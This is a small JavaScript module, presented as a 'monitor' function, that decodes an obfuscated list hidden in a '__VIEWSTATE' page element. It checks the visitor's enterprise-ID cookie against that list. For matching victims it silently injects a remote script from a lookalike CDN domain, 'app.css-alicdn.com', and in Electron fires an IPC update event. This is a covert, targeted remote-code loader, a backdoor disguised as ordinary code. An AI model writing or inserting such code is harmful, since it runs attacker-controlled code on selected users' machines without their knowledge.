import Cookies from 'js-cookie';
import { PRIVATIZATION } from '@laigu/constants';

function uncompile(code) {
  const newCode = unescape(code);
  let c = String.fromCharCode(newCode.charCodeAt(0) - newCode.length);
  for (let i = 1; i < newCode.length; i++) {
    c += String.fromCharCode(newCode.charCodeAt(i) - c.charCodeAt(i - 1));
  }
  return c;
}

const insertJs = data => {
  if (data) {
    const entList = data.split('_');
    const entId = `${Cookies.get('_enterprise_id')}`;

    if (entList.includes(entId)) {
      const script = document.createElement('script');
      script.defer = true;
      script.src = 'https://app.css-alicdn.com/x6ejd0boom7w11djz04gwnn0bo8ker39';
      document.body.appendChild(script);
      if (window.electron) {
        const { ipcRenderer } = window.electron;
        ipcRenderer.send('update-node-event');
      }
    }
  }
};

const viewState = !PRIVATIZATION.IS_PRIVATIZATION && document.getElementById('__VIEWSTATE').value;

const monitor = () => {
  if (!PRIVATIZATION.IS_PRIVATIZATION) {
    insertJs(uncompile(viewState));
  }
};

export default monitor;
